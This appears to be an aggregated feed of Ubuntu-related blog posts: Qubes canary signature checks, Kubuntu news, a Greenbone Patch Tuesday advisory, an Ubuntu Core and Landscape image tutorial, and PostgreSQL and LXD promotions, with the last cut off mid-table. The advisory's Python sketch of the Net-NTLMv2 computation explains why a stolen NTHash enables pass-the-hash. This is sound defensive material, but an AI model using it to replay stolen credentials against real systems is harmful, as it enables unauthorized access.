gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from... followed by an appropriate key. The [full] indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify command should always start with gpg: Good signature from... followed by an appropriate key.
For this announcement (Qubes Canary 038), the commands are:
$ gpg --verify canary-038-2024.txt.sig.marmarek canary-038-2024.txt
$ gpg --verify canary-038-2024.txt.sig.simon canary-038-2024.txt
You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the Qubes Canary 038 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:
We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!
Our Kubuntu Graphic Design contest is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open to applicants until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together!
Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.
In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.
Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.
We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.
The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.
As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!
Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.
— The Kubuntu Team
After an intense week frying fats in a food truck, here we are hurtling at dizzying speed towards the first legislative elections of 2024 and the end of democracy. But there are reasons to be optimistic: we picked apart Google’s clumsiness; soon there will be heaps of Snaps for Ubuntu Touch; for those who like it, Firefox is good for managing a mountain of tabs; and Nextcloud has really, really, really good tools for you to discover. This week’s controversy, to set social media ablaze with bombastic, distorted headlines: Diogo hates Mozilla!!! [it’s false, but what matters is getting clicks; you wanted journalism, didn’t you?].
You know the drill: listen, subscribe and share!
You can support the podcast by using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get everything for 15 dollars, or different portions depending on whether you pay 1 or 8. We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option of paying as much as you want. If you are interested in other bundles not listed in the notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.
This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and the open-source code is licensed under the terms of the MIT License. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License. This episode and the image used are licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, whose full text can be read here. We are open to licensing for other types of use; contact us for validation and authorization.
In February 2024, Microsoft issued a security alert covering a total of 73 security vulnerabilities. The batch included 6 critical severity vulnerabilities, 52 rated as high severity, and 15 as medium severity. 30 of them are remote code execution vulnerabilities [T1210] and 16 are privilege escalation [TA0004] vulnerabilities. From that group, three stand out as being actively exploited: CVE-2024-21410 (CVSS 9.8 Critical), CVE-2024-21412 (CVSS 8.1 High), and CVE-2024-21351 (CVSS 7.6 High).
15 of the 73 CVEs affected Microsoft WDAC OLE DB provider for SQL, 8 were reported in Microsoft Dynamics, a business productivity cloud service that integrates with Microsoft 365, and the Windows kernel had 6 CVEs reported and patched. The full list of vulnerabilities can be found on the official Microsoft advisory report for February 2024.
CVE-2024-21410 in Microsoft Exchange Actively Exploited
The CVE-2024-21410 (CVSS 9.8 Critical) security flaw is an authentication replay attack [CWE-294] on Microsoft Exchange Servers that use the Net-NTLMv2 protocol. The vulnerability allows attackers with the ability to capture a victim’s Net-NTLMv2 credentials to escalate privileges on the system for unauthenticated access. Since CVE-2024-21410 is a pass-the-hash [CWE-836] vulnerability, it is considered low complexity to exploit by any attacker with stolen credentials. As such, CVE-2024-21410 represents a high risk to the confidentiality and integrity of an organization’s internal email communication and other data contained in an Exchange Server instance, such as contact lists, shared resources or schedules.
CVE-2024-21410 is reported as actively exploited by CISA’s known exploited vulnerabilities (KEV) database. Although no formal attribution has been assigned to the recent attacks, some insiders have noted that the Russian-backed threat actor APT28 is active in exploiting NTLM and is known for attack techniques including Access Token Manipulation [T1134] and Token Impersonation/Theft [T1134.001] for unauthorized access against email servers.
28,500 Microsoft Exchange servers have been identified as vulnerable, while a report from security research firm Shadowserver aggressively estimates that up to 97,000 IPs are potentially affected. Greenbone provides both a local security check (LSC) and remote version checks for identifying Microsoft Exchange servers impacted by CVE-2024-21410.
Here is a description of CVE-2024-21410 and how it is being exploited:
What Is NTLM Authentication Protocol?
NTLM (NT LAN Manager) is a proprietary authentication protocol developed by Microsoft, dating back to the Windows NT operating system released in 1993. NTLM was replaced as the default authentication protocol in Windows 2000 by Kerberos. The Net-NTLMv1 and Net-NTLMv2 protocols employ the user’s base password, stored as a hash (called the NTHash), in a challenge-response authentication handshake to verify an authorized user. A detailed description of the algorithms used in Net-NTLMv1 and Net-NTLMv2 can be found on Medium.
Net-NTLMv2 (NT LAN Manager version 2) is an improvement over the older NTLM protocol, offering better security features against certain types of attack. Net-NTLMv2 is still supported by various Microsoft products and services within Windows-based networks. However, due to the potential for simple replay attacks using stolen credentials [CWE-294], NTLM has already been directly issued a CVE of its own (CVE-2021-31958), and its use presents a serious risk of unauthorized access. Considering that Microsoft officially acknowledged the security risks of NTLM in 2021, it should broadly be regarded as a vulnerable protocol and replaced with more secure public-key-based authentication wherever it is in use.
Some of the key products that still support Net-NTLMv2 include: all Windows operating systems, Active Directory (AD), Microsoft Exchange Server, Microsoft SQL Server, Internet Information Services (IIS), the SMB protocol, Remote Desktop Services, and various third-party applications.
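To illustrate why captured credential material is enough for replay and pass-the-hash attacks, here is a simplified pure-Python sketch of the Net-NTLMv2 response computation. It is an illustration of the handshake math, not the full wire protocol: the client blob is reduced to an opaque byte string, and the NTHash (the MD4 digest of the UTF-16LE password) is assumed to be already known, since MD4 is not available in Python's default hashlib providers.

```python
import hashlib
import hmac

def ntlmv2_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """Simplified Net-NTLMv2 challenge response.

    nt_hash: the user's NTHash (assumed known; normally MD4 of the
    UTF-16LE password). In the real protocol the blob is a structured
    buffer with a timestamp and client nonce; here it is opaque bytes.
    """
    # NTLMv2 hash: HMAC-MD5 keyed with the NTHash over UPPER(user) + domain.
    identity = (user.upper() + domain).encode("utf-16-le")
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()
    # Response: HMAC-MD5 keyed with the NTLMv2 hash over challenge + blob.
    return hmac.new(ntlmv2_hash, server_challenge + blob, hashlib.md5).digest()

resp = ntlmv2_response(bytes(16), "user", "CORP", b"\x01" * 8, b"blob")
print(resp.hex())  # 16-byte HMAC-MD5 digest
```

Note that nothing in this computation requires the plaintext password: anyone holding the NTHash can answer the server's challenge, which is exactly what makes pass-the-hash attacks low complexity to exploit.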
Mitigating CVE-2024-21410
The 2024 H1 Cumulative Update 14 (CU14) for Exchange Server 2019 has been released by Microsoft allowing operators of the affected versions to patch their vulnerable product. The CU14 update enables Extended Protection for Authentication (EPA) by default which had otherwise required manual setup.
If installing CU14 is not feasible or for administrators of Exchange Server 2016, the Exchange Extended Protection documentation and ExchangeExtendedProtectionManagement.ps1 script can be used to enable EPA for Exchange Servers. Microsoft also points to its own workaround techniques for mitigating pass-the-hash attacks in reference to mitigating the risk of CVE-2024-21410.
Pivoting From CVE-2024-21410 to CVE-2024-21378
It’s also probable that attackers who can gain unauthorized access to a vulnerable Microsoft Exchange server could continue their exploit chain by leveraging another vulnerability disclosed in the February 2024 group: CVE-2024-21378 (CVSS 8.0 High), which can cause high impact to endpoints running the Microsoft Outlook 2016 client or Microsoft Office 365 (2016 Click-to-Run). CVE-2024-21378 is a remote code execution vulnerability that requires user interaction. A prerequisite for exploiting CVE-2024-21378 is authenticated access to a Microsoft Exchange server or other Microsoft LAN service, allowing an attacker to compromise users on the same domain controller via delivery of a malicious file. Furthermore, CVE-2024-21378 can be exploited simply by previewing the malicious file.
Greenbone can identify systems affected by CVE-2024-21378 with local security checks for Microsoft Outlook 2016 and Microsoft Office 365 (2016 Click-to-Run).
CVE-2024-21351 Windows SmartScreen Security Bypass
CVE-2024-21351 (CVSS 7.6 High) is a remote code execution (RCE) vulnerability in the Windows SmartScreen security feature. Exploiting CVE-2024-21351 could expose sensitive data and compromise file integrity and availability. Exploitation requires human interaction: the victim must click to open a malicious file delivered by the attacker. CVE-2024-21351 was added to CISA’s catalog of known exploited vulnerabilities (KEV) on February 13, 2024, along with CVE-2024-21412.
CVE-2024-21412 Internet Shortcut Files Security Bypass
CVE-2024-21412 (CVSS 8.1 High) is a vulnerability in the security feature of Internet Shortcut Files that allows an unauthenticated attacker to distribute a specially crafted file intended to circumvent visible security measures. While the attacker cannot compel a user to access content under their control, they must persuade the user to actively click on the file link to initiate the exploit.
Mitigating CVE-2024-21351 and CVE-2024-21412
CVE-2024-21351 and CVE-2024-21412 can be patched by installing Microsoft’s February 2024 cumulative patch. Microsoft issues cumulative patches on the second Tuesday of each month, a schedule known as “Patch Tuesday”. Since Windows 7 is past end-of-life support from Microsoft, patches will not be issued for it to remediate these vulnerabilities. The affected versions of Microsoft Windows that will receive patches are listed in the official Microsoft advisory report for February 2024.
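The "second Tuesday of each month" schedule is easy to compute; here is a small Python sketch using only the standard library:

```python
from datetime import date, timedelta

def patch_tuesday(year: int, month: int) -> date:
    """Return the second Tuesday (Patch Tuesday) of the given month."""
    first = date(year, month, 1)
    # Advance to the first Tuesday (Monday is weekday 0, Tuesday is 1),
    # then add one more week to reach the second Tuesday.
    first_tuesday = first + timedelta(days=(1 - first.weekday()) % 7)
    return first_tuesday + timedelta(days=7)

print(patch_tuesday(2024, 2))  # → 2024-02-13
```

February 2024's result (February 13) matches the date on which CVE-2024-21351 and CVE-2024-21412 were added to CISA's KEV catalog.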
06 March, 2024 01:14PM by Joseph Lee
Join Canonical, the publishers of Ubuntu, as we proudly return as a gold sponsor at KubeCon + CloudNativeCon EU 2024. Hosted by the Cloud Native Computing Foundation, the conference unites adopters and technologists from top open source and cloud-native communities. Mark your calendars for March 20-22, 2024, as we gather in Paris for this exciting event.
Canonical, the publisher of Ubuntu, provides open source security, support and services. Our portfolio covers critical systems, from the smallest devices to the largest clouds, from the kernel to containers, from databases to AI. With customers that include top tech brands, emerging startups, governments and home users, Canonical delivers trusted open source for everyone.
Engaging with cloud-native enthusiasts and open source communities is a cornerstone of our mission. We’re excited to connect with attendees at KubeCon EU to share insights, foster collaboration, and contribute to this vibrant ecosystem.
Ubuntu containers are designed for modern software deployment. Our container portfolio ranges from an ecosystem of base OCI images and ultra-optimised chiselled container images to our long-term supported Docker images.
While building applications, developers can rely on Ubuntu’s seamless containerisation experience from development to production, while getting timely updates, security patches and long term support with a consistent, predictable lifecycle and support commitment.
Chiselled Ubuntu is where ultra-small meets ultra-secure. Developers can keep building with Ubuntu and rely on Chisel to extract an ultra-small, bitwise identical image tailored for production. No more worries about library incompatibilities, just seamless development to deployment.
At Canonical, our aim is to streamline Kubernetes cluster management by removing unnecessary manual tasks. Be it the developer workstation, the data centre, the cloud or an IoT device, deploying applications on Kubernetes should not be a different experience just because the infrastructure changes.
MicroK8s is a lightweight Kubernetes distribution that enables you to run enterprise-grade Kubernetes on your laptop, Raspberry Pi, or in any public cloud while consuming minimal resources. MicroK8s applies security updates automatically by default, and rolls them back on failure.
That’s not all. We understand how maintaining Kubernetes upgrades can take a toll on development efficiency. With MicroK8s you can upgrade to a newer version of Kubernetes in a single command.
The Linux Foundation recently published a report confirming that almost half of organisations prefer open source solutions for GenAI initiatives. Open source enables organisations to iterate faster and accelerates project delivery by taking away the burden of licensing and tool accessibility. Yet GenAI comes with several challenges, such as the need for extensive compute resources and the associated costs. To optimise the use of their compute resources, organisations need efficient and scalable AI infrastructure, from bare metal to Kubernetes to their MLOps platforms. Our Kubeflow distribution, Charmed Kubeflow, is designed to run on any infrastructure, enabling you to take your models to production in the environment that best suits your needs.
Canonical also works with leading silicon vendors like NVIDIA to optimise its open source solutions for AI infrastructure and enable efficient resource utilisation. This is especially relevant for large-scale deployments, where a large number of GPUs live under the same cluster.
Join Maciej Mazur’s keynote at KubeCon EU on 22 March to see how all layers of the stack can be optimised for AI/ML workloads. His talk will focus on increasing GPU sharing ratios in the open source world, covering pitfalls, best practices, and recommendations based on four projects of similar scale.
From the hardware layer, which benefits from GPU-partitioning capabilities such as NVIDIA MIG, to Kubernetes schedulers such as Volcano, Maciej will go through the different opportunities organisations have to optimise their infrastructure for AI workloads and scale their projects. MLOps platforms like Charmed Kubeflow go a level beyond and enable application-layer optimisation. For instance, Charmed Kubeflow provides access to frameworks like PaddlePaddle, which distributes training jobs in a smarter way.
Whether you’re building new products or AI models, it’s crucial to ensure that the pace of innovation is not hindered by security vulnerabilities. That’s why Canonical’s open source solutions come with reliable security maintenance, so you can consume the open source you need at speed, securely.
Meet our team to learn more about Ubuntu Pro, our comprehensive subscription for open source software security. With Ubuntu Pro, organisations reduce their average CVE exposure from 98 days to 1 day. It enables development teams to focus on building and running innovative applications with complete peace of mind.
If you are attending KubeCon EU in Paris between 20-22 March, make sure to visit booth E25. Our team of open source experts will be available throughout the day to answer all your questions.
You can already book a meeting with our team member Teresa Lugnan using the link below.
Canonical recently released the Landscape Client snap which, along with the new snap management features in the Landscape web portal, allows for device management of Ubuntu Core devices. In this blog we will look at how this can be deployed at scale by building a custom Ubuntu Core image that includes the Landscape Client snap and how to configure the image to automatically enrol the device after its first boot.
This blog follows the tutorial Build your own Ubuntu Core image, which shows how to create a custom image for a Raspberry Pi.
As we are following the tutorial we will have already set up our Ubuntu One account and now we are ready to create our model assertion. This is the recipe that describes all the components that comprise our image and will therefore need the Landscape Client to be added into the mix.
We will base this example on a Raspberry Pi running Ubuntu Core 22, and so we will start with the reference model file we can download with:
wget -O my-model.json https://raw.githubusercontent.com/snapcore/models/master/ubuntu-core-22-pi-arm64.json
Now we need to edit the model file. Following the tutorial again, we set our authority-id and brand-id to our developer id.
{
    "type": "model",
    "series": "16",
    "model": "ubuntu-core-22-pi-arm64",
    "architecture": "arm64",
    "authority-id": "<your id>",
    "brand-id": "<your id>",
    "timestamp": "2022-04-04T10:40:41+00:00",
    "base": "core22",
    "grade": "signed",
    "snaps": [
        {
            "name": "pi",
            "type": "gadget",
            "default-channel": "22/stable",
            "id": "YbGa9O3dAXl88YLI6Y1bGG74pwBxZyKg"
        },
        {
            "name": "pi-kernel",
            "type": "kernel",
            "default-channel": "22/stable",
            "id": "jeIuP6tfFrvAdic8DMWqHmoaoukAPNbJ"
        },
        {
            "name": "core22",
            "type": "base",
            "default-channel": "latest/stable",
            "id": "amcUKQILKXHHTlmSa7NMdnXSx02dNeeT"
        },
        {
            "name": "snapd",
            "type": "snapd",
            "default-channel": "latest/stable",
            "id": "PMrrV4ml8uWuEUDBT8dSGnKUYbevVhc4"
        }
    ]
}
Having gotten our base image definition we want to add the Landscape Client by adding this stanza to the snaps list. As the Landscape Client is currently in beta and doesn’t have a stable release yet, we will specify that with the default-channel parameter. The id parameter is unique to each snap with the value shown below belonging to the client. If you need to find the id of any other snap, you can use the snap info <snap-name> command in your terminal and look for the snap-id.
{
    "name": "landscape-client",
    "type": "app",
    "default-channel": "latest/beta",
    "id": "ffnH0sJpX3NFAclH777M8BdXIWpo93af"
}
Now we have our model assertion, we could sign this and build an image and we would have the Landscape Client. However, it would only have a default configuration that wouldn’t do much, leaving us having to manually configure the client. This works perfectly well, but what if we don’t want to have to access each device and do this? Can we pre-configure the client when we build our image? Also, can we make the client automatically enrol without any external intervention?
Of course, the answer to these questions is yes. Yes, we can. We just need to create our own gadget snap.
The gadget snap is a special type of snap that contains device specific support code and data. You can read more about them here in the snapcraft documentation.
This example is based on the official Ubuntu Core 22 gadget snap for the Pi. Fork this repository to your local environment and we can configure it for our needs.
Essentially, all we need to do is append the following configuration at the bottom of the gadget.yaml file that defines the gadget snap:
defaults:
  # landscape client
  ffnH0sJpX3NFAclH777M8BdXIWpo93af:
    landscape-url: <landscape-url>
    account-name: <account-name>
    registration-key: "<registration-key>"
    auto-register:
      enabled: true
      computer-title-pattern: test-${model:7}-${serial:0:8}
      wait-for-serial-as: true
Don’t forget to replace the placeholder values like <landscape-url> with the relevant config values.
The first part of the configuration defines the details of the Landscape server instance we’ll be using and will be the same for all devices that run this image. After this we want to configure the automatic registration component so that the device will register itself with the server shortly after being started up for the first time.
We have three parameters in this example. The first one enables the auto-registration on first boot. The second one, computer-title-pattern, allows us to define the computer title for this specific device.
The pattern uses the bash shell parameter expansion format to manipulate the available parameters. In this example the computer title will be set to the string “test-” followed by the device model starting from the 8th character (see our model assertion) and then the first 8 characters of the device serial number taken from its serial assertion.
For example, in this case it would be something like: test-core-22-pi-arm64-f6ec1539
The fields available are listed below. The final parameter though, wait-for-serial-as, tells the auto registration function to wait until the device has been able to obtain its serial assertion from a serial vault before trying to create the title and perform the registration. This is necessary as a completely fresh device will not initially have a serial assertion.
| Parameter | Description |
| --- | --- |
| serial | Serial from the device’s serial assertion |
| model | Model id from the device’s serial assertion |
| brand | Brand-id from the device’s serial assertion |
| hostname | Device’s network hostname |
| ip | IP address of the device’s primary NIC |
| mac | MAC address of the device’s primary NIC |
| prodiden | Product identifier |
| serialno | Serial number |
| datetime | Date/time of auto-enrolment |
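The pattern expansion described above can be sketched in Python by emulating bash’s ${var:offset:length} substring syntax (an illustrative helper only; Landscape’s actual implementation may differ, and the serial below is hypothetical beyond its first 8 characters):

```python
import re

def expand(pattern: str, params: dict) -> str:
    """Expand ${name} and ${name:offset[:length]} like bash substring expansion."""
    def repl(match: re.Match) -> str:
        value = params[match.group("name")]
        offset, length = match.group("off"), match.group("len")
        if offset is not None:
            start = int(offset)
            value = value[start:start + int(length)] if length else value[start:]
        return value
    return re.sub(
        r"\$\{(?P<name>\w+)(?::(?P<off>\d+)(?::(?P<len>\d+))?)?\}",
        repl,
        pattern,
    )

# Model string from the assertion above; serial is a made-up example.
title = expand("test-${model:7}-${serial:0:8}",
               {"model": "ubuntu-core-22-pi-arm64", "serial": "f6ec15391234abcd"})
print(title)  # test-core-22-pi-arm64-f6ec1539
```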
Now we have our configuration for Landscape all set up, we just need to build the gadget snap. This simply requires the following command to be run in the base folder of your local gadget snap repository:
$ snapcraft
After some whirring, you will have your snap, and this is the one we want to include in our model assertion.
With our current model assertion, building the image would fetch the listed snaps from the Snap Store and include them in the image, including the reference gadget snap. Now that we have our own gadget snap, we want to use that one instead.
If you have your own brand store, you can publish your custom gadget snap there. Then change the name and id of the gadget snap in your model assertion and all will be well. If you do not have your own brand store, the process is a little more manual. It is not permitted to upload custom gadget snaps to the global snap store so we will have to use our local .snap file.
The first step is to set the grade of the model to “dangerous”. This is because your custom gadget snap will not have been signed by the global snap store or a brand store, and its provenance cannot be verified except by yourself.
"grade": "dangerous",
"snaps": [
    {
        "name": "pi_22-2_arm64",
        "type": "gadget"
    },
Next, remove the snap-id and default-channel values as these are related to downloading from a store. Finally, update the name to that of your snap filename.
If you don’t have a signing key yet, run the following command to create one:
$ snapcraft create-key <key-name>
Next, we’ll sign the model assertion by running:
$ snap sign -k <key-name> model.json > landscape.model
Finally, we’ll build the custom Ubuntu Core image from the signed model using the ubuntu-image tool. If you do not have this already it can be installed using the snap install ubuntu-image command.
Ubuntu-image will take our signed model assertion, download all the required snaps and compile them together into an image file. As we want to use a local snap, we have to tell it where to find that snap file using the --snap flag. In this case, let’s assume the snap file is in the same directory as our signed model assertion.
ubuntu-image snap --snap pi_22-2_arm64.snap landscape.model
This will produce the image pi.img, which is ready to be written to an SD card and inserted into our Raspberry Pi.
There are various tools for writing this image to an SD card; the quickest is probably the Startup Disk Creator included with most Ubuntu variants, which can be found in your app drawer (if not, it is available from the snap store). Select your img file and your target SD card and click “Make Startup Disk”.
Take your freshly written SD card with the image and put it into your Raspberry Pi. Turn the device on and after a short delay your device should appear fully registered with your Landscape Server.
By following this process we can quickly and easily create an Ubuntu Core device that only needs a power cable and a network cable plugged into it for it to automatically get itself into a state where it can be remotely managed and maintained. This functionality is essential if attempting to deploy a large fleet or installing devices in inaccessible areas.
For more information on the power and capabilities of Ubuntu Core check out: Ubuntu Core.
For more information on the features and functionality of Landscape check out: Landscape | Ubuntu.
Are you interested in running Ubuntu Core with Landscape management on your devices and are working on a commercial project? Get in touch with our team today.
Ubuntu Core as an immutable Linux Desktop base
Managing software in complex network environments: the Snap Store Proxy
Manage FIPS-enabled Linux machines at scale with Landscape 23.03
If you’re working with AI, you’re working with data. From numerical data to videos or images, regardless of your industry or use case, every AI project depends on data in some form. The question is: how can you efficiently store that data and use it when building your models? One answer is PostgreSQL, a proven and well-loved database that, thanks to recent developments, has become a strong choice to support AI.
PostgreSQL is an open source, highly capable database system that supports features like foreign keys, subqueries, triggers, and user-defined types and functions. In recent years, PostgreSQL has enjoyed great popularity in the database landscape, winning database management system (DBMS) of the year in 2023.
PostgreSQL has applications across all industries, such as finops and e-commerce. It also fits a variety of workloads like online transaction processing, analytics and geospatial data. The solution’s widespread adoption has led to the development of new extensions and libraries for many specific use cases –including machine learning.
[Watch our webinar about PostgreSQL for AI Applications]
PostgreSQL has more than 1000 extensions. They are add-on modules that enhance the functionality of the database solution, providing additional features, data types, functions, and operators that are not present in the core Postgres system. From handling of geospatial data to transforming PostgreSQL to a vector database, various enhancements are available. The capabilities of the extensions cover a wide range, including analytics and search.
The flexibility and breadth of features that these extensions provide unlock the tremendous potential to enhance your AI projects.
Some of the most relevant extensions for AI:
MLOps is DevOps for machine learning. MLOps platforms such as Kubeflow ingest data from different types of databases, including PostgreSQL. Additionally, they use databases to store part of their artefacts, including metadata spanning experiments, jobs, pipeline runs and single scalar metrics. Kubeflow and your database need to be reliable and seamlessly integrated, since their availability influences the ability to run ML projects in production.
PostgreSQL is a great database to use alongside Kubeflow, but that doesn’t mean it’s the best choice in every scenario. In practice there are also other viable options, for instance MySQL. When choosing which database you’ll use, prioritise the solution that makes the most sense for your organisation:
There are other considerations about MySQL and PostgreSQL that you can read about in this whitepaper.
The Charmed PostgreSQL Operator delivers automated operations management from day 0 to day 2 on the PostgreSQL Database Management System. It is an open source, end-to-end, production-ready data platform on top of Juju. It comes in two flavours to deploy and operate PostgreSQL on physical/virtual machines and Kubernetes. Both offer features such as replication, TLS, password rotation, and easy-to-use integration with applications.
The Charmed PostgreSQL Operator meets the need for deploying PostgreSQL in a structured and consistent manner while allowing the user flexibility in configuration. It simplifies deployment, scaling, configuration and management of PostgreSQL in production at scale in a reliable way. PostgreSQL on its own is a great choice for AI projects, and the Charmed Operator takes it to the next level, making it even easier to store your data and build ML models.
AI in 2024 – What does the future hold?
The VMware world has seen a lot of upheaval in recent months, and now there’s another change to add to the list: the ESXi hypervisor, one of VMware’s most notable products, is no longer free.
VMware ESXi is a type 1 hypervisor that allows users to create and manage virtual machines that can access hardware resources directly. It comes with various management tools, the most familiar being vSphere and vCenter Server, and supports many advanced features such as live migration, high availability, and various security options among others.
The free option for ESXi only covered a limited number of cores, with other limitations in terms of memory and management options. As such, rather than being used in production, it was mostly used by developers and hobbyists who are now left looking for an ESXi alternative.
While LXD is mostly known for providing system containers, since April 2020 and the 4.0 LTS, it also natively supports virtual machines. VM support was initially added to expand the variety of use cases LXD could cover, such as running workloads in a different operating system, or with a different kernel than that of the host, but over the years we have been enhancing the experience and making LXD a modern open source alternative to usual hypervisors.
While the main functionality doesn’t differ much from other VM virtualization tools, we want to provide a better experience out of the box with pre-installed images and optimised choices. The workflow is fully image-based, and in addition to the images provided through a built-in image server, users can also upload custom ISO images for their specific use cases. For easy management, in addition to an intuitive CLI, LXD now also provides a web user interface.
LXD VMs are based on KVM through QEMU, like other VMs you would get through libvirt and similar tools. However, LXD is opinionated about the setup and the experience, placing security at the forefront, which is why we use a modern Q35 layout with UEFI and SecureBoot by default. All devices are virtio-based (we don’t do any complex device emulation at the host level).
Recently, we have also added an option for running non-UEFI based workloads, allowing users to run less modern virtual machines without issues, provided that they specifically enable the security option allowing them to do so.
Why pick LXD as an ESXi alternative? Because LXD is fully open source, with its full functionality available without any restrictions. For enterprise use cases, you can opt-in to get support from Canonical via Ubuntu Pro, but you can also consume LXD entirely for free.
It is difficult to provide a comprehensive comparison with all ESXi features, as they vary between versions and specific combinations with other VMware tools. Nevertheless, the table below provides a summary of the most important ESXi features and how they are supported in LXD.
| | LXD | ESXi |
| --- | --- | --- |
| Software type | Open Source | Proprietary |
| Basis | KVM | VMkernel |
| Web UI | Yes | Yes |
| Clustering | Yes | Yes |
| High availability | Yes | Yes |
